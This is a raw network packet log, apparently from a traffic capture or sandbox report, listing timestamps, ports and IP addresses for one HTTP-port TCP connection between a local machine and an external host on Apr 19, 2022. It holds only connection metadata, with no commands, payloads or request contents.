Apr 19, 2022 16:44:42.461663008 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.461750031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.461822987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.461976051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.462034941 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.462059021 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.462124109 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.462188959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.462287903 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.462409019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.462471008 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.462482929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.462532997 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.462605953 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.462747097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.462865114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.462924957 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.462943077 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.462995052 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.463048935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.463186026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.463303089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.463372946 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.463428020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.463486910 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.463498116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.463669062 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.463783979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.463850021 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.463869095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.463917971 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.463990927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.464147091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.464225054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.464287996 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.464318991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.464371920 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.464421034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.464585066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.464632034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.464694023 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.464766979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.464822054 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.464873075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.464993954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.465120077 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.465184927 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.465240002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.465300083 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.465450048 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.465753078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.465830088 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.465894938 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.465950966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.466005087 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.466077089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.466202974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.466244936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.466305017 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.466418982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.466473103 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.466475010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.466578960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.466711998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.466774940 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.466816902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.466867924 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.466969967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.467092991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.467145920 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.467204094 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.467259884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.467310905 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.467402935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.467488050 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.467673063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.467730045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.467746973 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.467783928 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.467866898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.468096972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.468333006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.468410969 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.468552113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.468609095 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.468777895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.468888998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.469036102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.469095945 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.469285965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.469345093 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.469480991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.469674110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.469696045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.469755888 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.469901085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.469923019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.469958067 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.470052958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.470104933 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.470180988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.470278025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.470392942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.470458984 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.470535040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.470592976 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.470614910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.470736980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.470860958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.470918894 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.470937967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.470988035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.471040964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.471177101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.471292019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.471353054 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.471393108 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.471442938 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.471532106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.471616030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.471749067 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.471808910 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.471940994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.471997023 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.472008944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.472090960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.472208977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.472271919 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.472294092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.472343922 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.472461939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.472580910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.472697973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.472755909 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.472763062 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.472812891 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.472902060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.473059893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.473176956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.473237038 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.473249912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.473294973 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.473381042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.473457098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.473571062 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.473589897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.473702908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.473790884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.473849058 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.473927021 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.473980904 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.474034071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.474129915 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.474246979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.474309921 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.474349022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.474400043 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.474472046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.474597931 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.474700928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.474761009 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.474864006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.474922895 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.474931955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.475052118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.475131989 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.475191116 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.475414038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.475470066 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.475622892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.475860119 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.475961924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.476018906 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.476097107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.476150036 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.476186991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.476306915 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.476423979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.476483107 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.476564884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.476619005 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.476649046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.476778030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.477052927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.477117062 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.477288008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.477340937 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.477629900 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.477849960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.477920055 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.477967978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.478049994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.478244066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.478296995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.478305101 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.478348970 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.478395939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.478533030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.478698015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.478725910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.478759050 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.478792906 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.478858948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.478941917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.478996038 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.479070902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.479211092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.479304075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.479357958 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.479453087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.479506969 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.479536057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.479655981 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.479773998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.479829073 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.479912996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.479967117 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.479993105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.480112076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.480211973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.480262995 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.480380058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.480451107 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.480506897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.480568886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.480681896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.480734110 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.480803967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.480858088 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.480892897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.481007099 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.481125116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.481175900 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.481267929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.481319904 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.481327057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.481453896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.481645107 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.481662035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.481702089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.481857061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.481909990 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.481924057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.481970072 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.482055902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.482156992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.482280016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.482336998 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.482374907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.482429981 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.482476950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.482660055 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.482678890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.482728004 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.482830048 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.482881069 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.482917070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.483103037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.483298063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.483351946 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.483560085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.483613014 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.483782053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.483972073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.484258890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.484323025 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.484458923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.484519005 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.484693050 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.484810114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.484965086 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.485019922 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.485058069 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.485116005 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.485224962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.485296011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.485428095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.485483885 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.485491037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.485553026 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.485605955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.485761881 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.485846043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.485901117 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.485946894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.485997915 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.486087084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.486179113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.486294031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.486349106 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.486434937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.486488104 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.486560106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.486619949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.486736059 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.486788988 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.486856937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.486907959 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.486944914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.487085104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.487179041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.487236023 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.487332106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.487392902 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.487407923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.487525940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.487643003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.487703085 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.487750053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.487803936 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.487874031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.488004923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.488101959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.488158941 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.488195896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.488248110 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.488296032 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.488430023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.488531113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.488586903 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.488651037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.488703012 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.488755941 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.489018917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.489237070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.489289999 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.489337921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.489389896 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.489475965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.489589930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.489706993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.489759922 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.489808083 CEST	80	49758	45.135.48.153	192.168.2.4
